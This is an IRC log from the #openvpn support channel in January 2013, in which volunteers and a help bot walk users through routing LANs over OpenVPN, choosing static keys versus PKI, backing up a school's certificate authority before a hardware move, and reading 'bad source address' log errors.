digilink: iroute is only valid in a ccd or --client-connect context, both of which are exclusive to mutli-client (or "server") mode, which implies using PKI. Use of 'route' is used instead in a p2p setup with --secret 19:46 < digilink> thanks pekster, I was afraid that would be the case :( I'm trying to avoid having to NAT the traffic across the VPN 19:46 <+pekster> I don't see how your choice of static keyed verses TLS/X509 makes any difference in that 19:47 < digilink> will I need to NAT my traffic from each LAN regardless? just trying to make everything as transparent as possible 19:47 <+pekster> Not if you configure routing properly at each LAN 19:48 < digilink> so say I add static routes at each lan, that points to the other lan and make the gateway that of the openvpn instance in each, would that be enough to do it? 19:49 <+pekster> Yes, along with firewalls rules. FYI, you don't need the OpenVPN peer at either end to be your default gateway (in such a setup the default gateway would need to be made aware of the LAN and route to the VPN peer on that segment) 19:50 < digilink> got it (I think lol) gonna start playing with configs 19:51 <+pekster> You should also make a concious decision about using static keys becuase you're giving up perfect forward secrecy in terms of a security benefit that X509 provides 19:52 < digilink> I've been reading on that as well 19:52 <+pekster> Either way can work from a routing perspective for what you're trying to do, so it's purely a security and semantic choice when you just have 2 peers 19:53 <+pekster> Ah, here's the bot's snippit on that: 19:53 <+pekster> !forwardsecurity 19:53 <@vpnHelper> "forwardsecurity" is (#1) in server/client mode with certs your key renegotiates (changes) every hour (by default), so if someone captures your traffic, and then gets your key, they can only decrypt the traffic within the timeframe since last renegotiation or (#2) in ptp mode (static key) you do not have this, so if someone gets your key they can decrypt ANY past traffic that they captured 19:54 < digilink> interesting... 19:54 < digilink> so in other words, use PKI :) 19:54 <+pekster> As far as configuration, the bot links to a handy flowchart for getting client/server LAN access working. Pick one to work on at a time, and remember you wouldn't be using iroute options if you use a static key setup (use a normal route instead.) 19:54 <+pekster> !serverlan 19:54 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 19:55 <+pekster> !clientlan 19:55 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route 19:55 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 20:04 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 256 seconds] 20:18 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 20:18 -!- ben1066 [~quassel@2a03:b200:9::824e:1e6e] has joined #openvpn 20:18 -!- ben1066 [~quassel@2a03:b200:9::824e:1e6e] has quit [Changing host] 20:18 -!- ben1066 [~quassel@unaffiliated/ben1066] has joined #openvpn 20:19 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 20:21 < fu_fu> Hi can anybody help? I have a windows setup with client LAN 10.1.2.0/24 server 10.8.0.0/24; i need all clients to be able to connect to the 10.1.2.0 CLient connected LAN. I can only get a ping to the actual server NIC 10.1.2.15 20:22 <+pekster> !serverlan 20:22 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 20:24 < fu_fu> nice chart! shoudl this do the task? route 10.1.2.0 255.255.255.0 20:24 < fu_fu> push "route 10.1.2.0 255.255.255.0" 20:25 < fu_fu> so the client needs a route back to the server? the thing is that i have a printer at 10.1.2.26 that needs to be avail, the printer is default route to 10.1.2.15 20:25 < DBordello> great chart, that problem frustrated me for hours yesterday 20:25 < DBordello> fu_fu, consider a TAP tunnel? 20:26 <+pekster> You don't want tap for that... 20:26 < DBordello> pekster, why? 20:26 <+pekster> Printers do not require Ethernet frames to function 20:26 <+pekster> !tunortap 20:26 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 20:26 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! 20:27 <+pekster> fu_fu: Follow the flowchart. You need to set up the route to the VPN on the default gateway for the LAN (this will be done for you if the VPN server is also the LAN's default gateway.) 20:27 < DBordello> What is nathack? 20:27 <+pekster> source NAT between 2 LANs is ugly and breaks bi-directional connectivity 20:28 < DBordello> figures 20:28 <+pekster> The only reason you'd ever need to do that is if you don't control the gateway in your enviornment 20:28 <+pekster> Actually, NAT in general is ugly 20:28 < DBordello> the reason I used TAP was since I don't have a gateway on the LAN 20:29 <+pekster> That makes no sense. Not having a gateway to the rest of the Internet would mean you don't need a VPN to start with 20:29 < fu_fu> the client is the one with the LAN that needs to be accessed, i could just switch it around client for server, but I rather not. 20:29 <+pekster> fu_fu: Oh, the LAN is on the client? 20:29 <+pekster> k 20:29 <+pekster> !clientlan 20:30 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route 20:30 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 20:30 < fu_fu> ipforwarding is enabled and tests : YES 20:30 <+pekster> Sorry, I mis-read that and your question was properly phrased from the start :( 20:30 < DBordello> pekster, it is an internal mangament lan. I am accessing it through a dual-homed server, that is where the VPN comes in 20:31 <+pekster> DBordello: Ah, gotcha. I tend to prefer SNAT for stuff like that, but whatever works for you 20:31 <+pekster> Or just route your "special VPN users" to the LAN and drop a gateway there allowing only access to those users 20:32 <+pekster> A default gateway on a management backend is fine as long as you have strict access controls to reach it 20:32 < fu_fu> in the diagram, last section, says do you have access to the router? does this mean the default router of the client machine? 20:32 < DBordello> I decided to play it safe, no gateway needed. It is mostly IPMI etc type devices. THey have a tendency to forget their gateway anyways 20:32 <+pekster> fu_fu: Yes. The systems on your client LAN need to form a reply packet, and it needs to go back over the same path it took to get there 20:33 <+pekster> DBordello: Sure. I'm not saying it's always bad, but it's "often" the wrong decision to completely lock off a LAN, and then just hack around the security in the end anyway ;) 20:34 < fu_fu> ok, so do i route to the LAN interface of the client, 10.1.2.15 or to the tunnel? 20:34 < DBordello> pekster, probably true ;) 20:34 <+pekster> fu_fu: Gateways are always on your local network 20:35 <+pekster> Add a return route for the VPN network range routed through the VPN client's local IP with respect to the client-side LAN 20:35 < fu_fu> cool, i will try it now 20:36 < DBordello> On the return path, would it go PC -> Gateway -> VPN PC? 20:36 < DBordello> Well 20:36 < DBordello> PC -> Gateway -> VPN PC === VPN ===> Client 20:37 < DBordello> The fact that those first two links are in the same physical segment doesn't cause problems? 20:38 <+pekster> Nope. That's how routing works 20:39 <+pekster> A gateway just looks up the OSI L2 address of a system to send a packet based on its L3 destination 20:39 < DBordello> interesting 20:39 < DBordello> i guess it doesn't care whaT L2 segment it is on 20:40 <+pekster> Sure it does; you can't send an Ethernet frame to something that's not on your LAN ;) 20:40 <+pekster> Say my network is 192.168.50.0/24; I can't just magically route to a network via 10.20.30.6, because I can't directly reach that system by Ethernet 20:41 <+pekster> You might get some learning material out of a link like this: 20:41 <+pekster> !tcpip 20:41 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know 20:42 < fu_fu> you dudes rock! 20:51 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has quit [Read error: Connection reset by peer] 20:53 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 20:54 < fu_fu> ok so the client-side LAN router can get to the VPN tunnel and to the other side to the VPN server, even to clients on the other end of the vpn. VPNserver still can not ping the printer 20:55 < fu_fu> vpnserver->TUN>Client>printer 20:55 < fu_fu> i get the learn message in the daemon when I try to ping so i guess it is not getting back correctly 20:56 <+pekster> Where in the flowchart are you getting stuck? 20:58 <+pekster> It could be a firewall issue too; are you firewall rules permissive of the reply traffic on your VPN server? 20:58 < fu_fu> i just added the route to the router, and it works fine, can get to clinets over the vpn even past the server 21:00 < fu_fu> ok, i can not ping the clientside router form the server 21:00 < fu_fu> so is the route problem on the server side, or still maybe a fw block 21:01 <+pekster> You need to start at the very top of the flowchart instead of jumping around from the top all the way to the bottom 21:06 < fu_fu> I will check again, but I think I did. "can ou ping another mahcine in the LAN? NO, access to router, YES, route added router can ping to 10.8.0.1(tunnel side of server)" 21:10 <+pekster> Okay, so from the VPN server you can ping the IP of a system on the client LAN that's not the VPN client system? 21:11 < fu_fu> no 21:11 <+pekster> So, you likely have a firewall issue at your client-LAN default gateway. You could test this by taking another LAN client and adding a manual route to the VPN network via the VPN client's LAN IP 21:11 <+pekster> If that works, you need to fix your firewall (or routing) on the client-side LAN gateway 21:11 <+pekster> If it doesn't, you'll need to post VPN config files because something else would be wrong 21:14 < fu_fu> ok, ya, i see i may need to add an access list for the ping to the VPN network 21:14 < fu_fu> would that give this type of issue? 21:38 <+pekster> It could, yes. A firewall at any path the packet takes is able to deny the traffic is so configured 21:43 < fu_fu> pekster, thank you for going through this with me. 21:47 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 21:47 <@ecrist> sup folks? 21:48 < fu_fu> Hi, ecrist 22:00 -!- brute11k [~brute11k@89.249.235.75] has quit [Quit: Leaving.] 22:22 -!- ben1066_ [~quassel@2a03:b200:9::824e:1e6e] has joined #openvpn 22:22 -!- ben1066_ [~quassel@2a03:b200:9::824e:1e6e] has quit [Changing host] 22:22 -!- ben1066_ [~quassel@unaffiliated/ben1066] has joined #openvpn 22:22 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 22:22 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 22:22 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 22:22 -!- mode/#openvpn [+o krzee] by ChanServ 22:22 -!- ben1066 [~quassel@unaffiliated/ben1066] has quit [Ping timeout: 260 seconds] 22:45 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Quit: Leaving.] 23:25 -!- soulse [~soulse@190.222.252.9] has left #openvpn ["Leaving..."] --- Day changed Tue Jan 08 2013 00:13 -!- jave_ [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn 00:13 -!- jgeboski- [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 00:14 -!- Netsplit *.net <-> *.split quits: WinstonSmith, jgeboski, jave 00:15 -!- jgeboski- is now known as jgeboski 00:16 -!- Netsplit over, joins: WinstonSmith 00:22 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Quit: Leaving] 00:24 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 00:43 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 00:54 -!- kyrix [~ashley@71-212-76-89.tukw.qwest.net] has joined #openvpn 01:24 -!- nutron [~nutron@unaffiliated/nutron] has quit [Remote host closed the connection] 01:39 -!- Devastator- [~devas@177.18.197.67] has joined #openvpn 01:41 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 255 seconds] 01:55 -!- csaba [~csaba@195.199.154.25] has joined #openvpn 01:56 < csaba> hi 01:56 < csaba> would like to ask for some help 01:57 < csaba> I have a firewall with openvpn on it, it is ipcop 01:58 < csaba> and soon I will have to replace the machine. The question is can I keep the existing openvpn keys on it once I move to new hardware? 01:58 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has quit [Ping timeout: 246 seconds] 01:58 < csaba> It is in a highschool where about 60 teachers have vpn keys so I do not want to recreate them. 01:58 <+pekster> csaba: Just copy them over; the keys and certs are just files (unless you're doing something with hardware devices, like smartcards. That's rare on a server.) 01:59 < csaba> same question, what happens if I have to change the ethernet card? 01:59 <+pekster> If you kept your PKI on that same host, back up that entire PKI directory (you should be doing that anyway in case the system has a problem and you need to recover, otherwise you'll have to start a new PKI) 02:00 <+pekster> If you have to change the Ethernet card? OpenVPN doesn't care about your network hardware so long as it has network access 02:00 < csaba> ok, I thought it creates some kind of link to that specific eth card for securuty reasons 02:00 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has joined #openvpn 02:01 <+pekster> Nope. The security is based on TLS using an X.509 PKI model 02:01 < csaba> but if it is that simple, that is cool 02:01 <+pekster> If you have a deployment like that with 60 remote field users, you should really consider your backup and disaster-recovery procedures too 02:02 <+pekster> (primarily applies to your PKI, since worst-case you could always generate a new server certificate. It really sucks to have to re-do a deployed PKI becuase your CA box exploded and you don't have backups) 02:03 < csaba> right now I have raid mirror and that is it 02:03 <+pekster> Just remember, you can't issue new certificates without your PKI files (easy-rsa, or whatever other frontend you might use to generate the certs) 02:04 < csaba> thanks, I need to find them then 02:05 < csaba> I thiink it is safe to just backup the entire openvpn dir 02:05 <@krzee> the ethernet card question assumes you're not in bridge mode 02:05 <+pekster> Yup. Some people keep them on the VPN server out of convenience, but it's bad practice to keep the CA files on the VPN server itself. Some smaller deployments may not care about best practices (a home VPN server, for example, might not need to split things like that) 02:06 <+pekster> With respect to the key/cert files it's not related to the card krzee 02:06 < csaba> do you have any experience with ipcop? 02:06 <+pekster> configs perhaps if the IP changes on the server in a bridge setup, but not the PKI 02:06 <+pekster> I have no experience with it 02:06 <@krzee> right 02:07 < csaba> I do not happen to find the pki files 02:07 <+pekster> Where'd you generate the PKI? 02:07 < csaba> I have .p12 and .pem files 02:08 < csaba> for the users 02:08 <+pekster> You're going to be very unhappy if you reformat that box and the CA was stored on there and you don't have backups 02:08 <+pekster> Step 1: find it. Step 2: do backups. Step 3: understand the importance of proper management of your security-centric infrastructure 02:09 <+pekster> ie: where is it you go to sign a new cert for a user or to re-issue an expiring one? 02:09 <@krzee> if a new teacher came, how would you make him a new cert? 02:10 < csaba> http://www.ipcop.org/2.0.0/en/admin/html/vpns-openvpn.html 02:10 <@vpnHelper> Title: 2.7.4. OpenVPN Configuration Administrative Web Page (at www.ipcop.org) 02:10 < csaba> like this 02:10 <@krzee> you better be careful before you format 02:10 < csaba> right now I was looking for the files over ssh on the server 02:10 <@krzee> you need to get the pki out 02:11 < csaba> wonder why do I need the pki when this setup does not have any? 02:12 < csaba> I think it is using a different method 02:12 < csaba> but I know little about this 02:12 < csaba> it was pretty easy to set openvpn up with ipcop 02:13 <@krzee> do you give your users files or passwords? 02:13 < csaba> well, both 02:13 < csaba> I generate a new user then also a password 02:14 <@krzee> i see 02:14 < csaba> and they change that later with openvpngui 02:14 <@krzee> oh ok 02:14 <@krzee> that is a passphrase on their cert 02:14 <@krzee> same as doing: 02:14 < csaba> so now when I see the files over ssh these are pem and p12 files 02:14 <@krzee> !factoids search cert 02:14 <@vpnHelper> 'servercert', 'certs', 'nocert', 'certverify', 'certinfo', 'cert_chains', and 'certfight' 02:14 <@krzee> !factoids search pass 02:14 <@vpnHelper> 'winpass', '2.1-winpass-script', 'authpass', 'password-only', 'strip-passphrase', 'change-passphrase', 'enable-passwd-save', and 'password' 02:15 <@krzee> !change-passphrase 02:15 <@vpnHelper> "change-passphrase" is see http://openvpn.net/archive/openvpn-users/2005-03/msg00230.html for how to change (or add) a key's passphrase 02:15 <@krzee> thats what the change password feature of openvpngui does 02:15 <@krzee> which means they are using pki 02:15 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Ping timeout: 255 seconds] 02:15 < csaba> let me verify then, if I backup the openvpn dir is that enough? 02:16 <@krzee> if i were you i would NOT format that box 02:16 <@krzee> i would get another one running how i want it 02:16 < csaba> if lets say I need to build a new one then copy openvpn over and be fine? 02:16 <@krzee> then you could format 02:16 <@krzee> no way for me to know 02:16 <@krzee> you're asking a ipcop question 02:16 <+pekster> csaba: Backing up the openvpn dir will NOT be enough UNLESS your entire CA PKI structure is in that directory (if it is, then you might be fine) 02:16 < csaba> oh of course I do not want to format 02:16 <@krzee> ^ 02:16 <+pekster> No one here can tell you where your PKI files are ;) 02:17 <+pekster> You should know this (you need to go there every time you sign a cert, so you should know how to find it yourself, hopefully) 02:17 <@krzee> he uses a web gui 02:17 <@krzee> this is why i hate web guis, it leads people to not know what they're really doing 02:17 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 252 seconds] 02:18 < csaba> I think like I said this pne uses pem and p12 files, and somehow they hold that PKI you gusy talk about 02:19 <+pekster> No, those are just the files issued to the server 02:19 < csaba> hm, ok 02:19 <+pekster> There's an entire PKI with your CA private key, about a dozen helper files that contain your entire certificate database, and every issued certificate you've ever processed 02:20 <+pekster> And if you fail to save it properly, you will never be able to issue another certificate, and will have to start which will void all the stuff you've issued. I'd strongly suggest you learn what PKI management is so you can do these steps yourself, otherwise you are risking this all happening anyway from a simple disk or filesystem failure 02:21 < csaba> yes, true and that is exactly what I am after 02:21 < csaba> thanks so far for taking your time with me 02:21 <@krzee> whatever you do, do not delete this system until after you have another server up and issuing working certs 02:22 < csaba> ok, thanks 02:22 < csaba> and all I wanted to know if openvpn was connected to the hw or not 02:22 < csaba> so good news is that it is not 02:23 <@krzee> openvpn is only dependant on the hw if you're in bridge mode 02:24 < csaba> are those PKI files have a .pki ending? 02:24 <+pekster> No. They're technically extension-independent, but usually contain a variety of .key, .crt (or .cert) and .csr (or .req) files 02:24 <+pekster> You could call them secret.jpg if you wanted; the system doesn't care 02:27 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 02:27 < csaba> ok, interestingly I have these dirs: ca, ccd, certs, crls openssl but only certs have files in them 02:28 < csaba> the mentioned pem and p12 files for users 02:30 <@krzee> where are those dirs? 02:31 -!- brute11k [~brute11k@89.249.235.75] has joined #openvpn 02:31 < csaba> /var/ipcop/openvpn 02:35 < csaba> the pki is the root host cert? 02:35 < csaba> I think as I remember this root host cert was the first I had to create 02:35 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Quit: Ex-Chat] 02:36 < csaba> for root I can download a cacert.pem and for host a hostcert.pem 02:37 < csaba> like this: http://www.ipcop.org/2.0.0/en/admin/html/vpns-ca.html 02:37 <@vpnHelper> Title: 2.7.5.Certificate Authorities Administrative Web Page (at www.ipcop.org) 02:39 <+pekster> You need to save the entire PKI structure. Not just the certs, and not just the keys. The entire PKI structure needs to be moved over if it's on that system. You'll have to check with the documentation of whatever frontend you're using, because I have no clue how it's designed or where the files are stored or whate format they're in 02:41 < csaba> ok, sorry guys and thanks for your patience 02:41 <+pekster> It sounds like this *might* be stored under /var/ipcop/openvpn, but I can't really be sure without seeing the setup 02:42 < csaba> ok, that is what I am guessing too, just weird that I do not find any pki 02:43 <+pekster> .pem is a common extension for holding any of the data types (PEM and DER are the 2 most common encodings of X509 data, along with the p12 container format) 02:43 <+pekster> Again, the extension is just convention and you could call them .blah if you wanted 02:46 -!- ade_b [~Ade@95.209.17.187.bredband.tre.se] has joined #openvpn 02:46 -!- ade_b [~Ade@95.209.17.187.bredband.tre.se] has quit [Changing host] 02:46 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:58 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 276 seconds] 03:06 -!- wrod [~wrodrigue@110.235.82.2] has joined #openvpn 03:21 < IT> gello 03:22 < IT> how can i link toghether 2 LAN's, with machines beeing able to ping eatch other via routing? what i'm i missing from this config http://pastebin.com/2AGRFSuK ? 03:23 -!- brute11k [~brute11k@89.249.235.75] has quit [Ping timeout: 240 seconds] 03:31 -!- Devastator- [~devas@177.18.197.67] has quit [Changing host] 03:31 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 03:31 -!- Devastator- is now known as Devastator 03:31 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:31 <+pekster> IT: At the very least an iroute since you've commented out the client-config-dir paramater that's required to support it. This is listed on the guide/flowchart: 03:31 <+pekster> !clientlan 03:31 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route 03:31 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 03:32 < IT> ty 03:32 < IT> !route_outside_openvpn 03:32 <@vpnHelper> "route_outside_openvpn" is (#1) If your server is not the default gateway for the LAN, you will need to add routes to your gateway. See ROUTES TO ADD OUTSIDE OPENVPN in !route or (#2) Here are 2 diagrams that explain how this works: http://www.secure-computing.net/wiki/index.php/Graph http://i.imgur.com/BM9r1.png 03:32 <+pekster> IT: Separate from that, you also need to follow the 2nd flowchart to fully support the LAN behind the server. You need both steps done fully and correctly in order to get bidirectional communication. The server-side LAN is desscribed here: 03:32 <+pekster> !serverlan 03:32 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 03:33 <+pekster> IT: remember, pick just one to fully work on at a time before moving to the next as they're both required 03:33 < IT> damn 03:36 -!- kyrix [~ashley@71-212-76-89.tukw.qwest.net] has quit [Quit: Ex-Chat] 03:40 -!- ronsel [~ronsel@dslb-088-074-167-187.pools.arcor-ip.net] has joined #openvpn 03:42 <@krzee> be sure you read and understand this: 03:42 <@krzee> !route 03:42 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 03:43 <@krzee> looks like you're missing an iroute 03:43 <+pekster> Yea, I noted that too but linked both docs in case there's more missing too 03:43 <@krzee> yep 03:44 < IT> allready added that in ccd "iroute 192.168.1.0 255.255.255.0" 03:44 <@krzee> you uncommented ccd in the server config too right 03:44 < IT> yeap 03:44 <@krzee> then continue with the flowcharts 03:44 < IT> that was there for debugging 03:45 <+pekster> You've also reversed your networks at some point 03:45 < IT> allredy reviewd them, there's something related to routing 03:45 <@krzee> IT, huh? 03:45 <@krzee> nowhere in my flowcharts does it say "theres something related to routing" 03:51 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 03:53 < fu_fu> can anyone tell me what this means? Tue Jan 08 03:21:19 2013 us=821375 ja/82.x.x.x:x1694 MULTI: bad source address from client [fe80::f88e:1c69:4d17:bf5], packet dropped how do I translate that address? the client addr is actually 192.168.1.5; last time i put iroute for that it brought the whole system down 03:56 <+pekster> fu_fu: Evidently your client is sourcing IPv6 data across the VPN from an address the server doesn't recoganize. I'm guessing that's a Windows client? I've seen them frequently get confused when multiple local addresses are available to source packets from due to poor multihoming abilities of the platform 03:56 <+pekster> There's nothing you can do really, besides fix whatever bad application on the client's end is doing something that silly 03:59 < fu_fu> hard to diagnose a remote client, is there a decoder for the source number? fe80::f88e:1c69:4d17:bf5] 04:00 <+pekster> The "decoder" you want is known as IANA which manages IPv6 (and IPv4) allocations 04:00 <@plaisthos> fu_fu: fe80 is link local 04:00 <+pekster> http://www.iana.org/assignments/ipv6-address-space/ipv6-address-space.xml 04:00 <@vpnHelper> Title: Internet Protocol Version 6 Address Space (at www.iana.org) 04:00 < fu_fu> right on, thanks again 04:00 <+pekster> OpenVPN should never be assigning that address to the TAP adapter for the VPN interface, so Windows has made a mistake and is sourcing traffic poorly 04:01 <+pekster> I've seen it do that on completely IPv4 networks too with its LAN IP, so it's just bad OS design 04:01 <+pekster> It's not a problem as OpenVPN drops such badly sourced packets (you can ignore the error, unless it's a sign of a broken application you need to debug from the client side) 04:03 < fu_fu> the broken app is Remote Desktop I think, but could be the user is using IPv6 autoassign, and these are just regular bcasts, right 04:04 <@krzee> bcasts over ipv4? 04:04 <+pekster> It has no route across the VPN adapter for such packets unless you've specificlly set up IPv6 support. So no, it's just Windows screwing things up 04:05 <+pekster> Also save to ignore 04:05 <+pekster> safe* 04:06 -!- dazo_afk is now known as dazo 04:07 < fu_fu> i had the server close socket 3 times in the past four hours, and it coincides with this err message, i thought it related 04:09 <+pekster> That's an error dealing with encapsulated addressing within your tunnel. I hope you don't mean OpenVPN is getting disconnected as a result 04:11 < fu_fu> i will up the logging factor, best to find out, than suppose 04:16 -!- brute11k [~brute11k@89.249.235.33] has joined #openvpn 04:17 < fu_fu> need to get some sleep, take care all 04:18 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Quit: Leaving.] 04:33 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 04:34 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 240 seconds] 04:44 <@dazo> pekster: if you see people here having the "MULTI: bad source address" issue ... this might be a good pointer: http://openvpn.net/index.php/open-source/faq/79-client/317-qmulti-bad-source-address-from-client--packet-droppedq-or-qget-inst-by-virt-failedq.html 04:44 <@vpnHelper> Title: "MULTI: bad source address from client , packet dropped" or "GET INST BY VIRT: [failed]"? (at openvpn.net) 05:04 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 252 seconds] 05:06 -!- Eagleman [~Eagleman@D4B2D271.static.ziggozakelijk.nl] has joined #openvpn 05:06 < Eagleman> How much speedloss in MB's will there be on an 60MB connection with 256bit encryption? 05:16 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 05:25 -!- wrod [~wrodrigue@110.235.82.2] has quit [Remote host closed the connection] 05:28 < kisom> Eagleman: How fast does my car go if I push it to the max? 05:36 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 05:36 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 05:36 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 05:36 -!- mode/#openvpn [+o krzee] by ChanServ 05:42 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 276 seconds] 05:43 < pppingme> Eagleman Its a legit question, but I don't know the answer, encryption will add some overhead, so there will be more data obviously, but I don't know the numbers 05:44 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 05:45 < pppingme> Eagleman on the plus side, openvpn does support compression, which doesn't happen over a typical connection, so it may be a wash, or even to your advantage, depending on the type of data. 05:47 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn 05:48 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has joined #openvpn 05:49 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has quit [Read error: Connection reset by peer] 05:53 -!- thermoman [~thermoman@idle.foobar0815.de] has joined #openvpn 05:53 < thermoman> is it possible to use cidr notation for push route? 05:53 < thermoman> e.g. push "route 1.2.3.4/24" 05:53 < thermoman> instead of 05:53 < thermoman> e.g. push "route 1.2.3.4 netmask 255.255.255.0" 05:53 <@plaisthos> thermoman: no 05:53 < thermoman> the netmask version is ugly to read 05:53 < thermoman> :( 05:54 <@plaisthos> thermoman: you can create a patch if you want :) 05:54 * thermoman submits a feature request 05:54 < thermoman> :) 05:54 <@krzee> you read your routes often? 05:54 <@krzee> your vpn configs? 05:55 <@krzee> i configure my stuff, and then it works 05:55 <@krzee> if your desktop background picture is your vpn config, i understand 05:55 <@plaisthos> not even some professional equipment does support cidr for route syntax ;) 06:00 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 256 seconds] 06:17 <@krzee> !ping 06:17 <@vpnHelper> pong 06:20 <@plaisthos> lol 06:25 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 06:32 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 240 seconds] 06:37 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 06:43 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 06:47 -!- ade_b [~Ade@redhat/adeb] has quit [Client Quit] 06:56 -!- ade_b [~Ade@95.209.17.187.bredband.tre.se] has joined #openvpn 06:56 -!- ade_b [~Ade@95.209.17.187.bredband.tre.se] has quit [Changing host] 06:56 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 06:59 -!- `Ile` [~kvirc@212-200-214-138.dynamic.isp.telekom.rs] has joined #openvpn 07:22 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 260 seconds] 07:22 -!- GabrieleV_ [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 07:25 -!- Carbon_Monoxide [~cmonxide@n219078079066.netvigator.com] has joined #openvpn 07:27 -!- Carbon_Monoxide [~cmonxide@n219078079066.netvigator.com] has left #openvpn [] 07:30 -!- GabrieleV_ is now known as GabrieleV 07:35 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 07:36 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 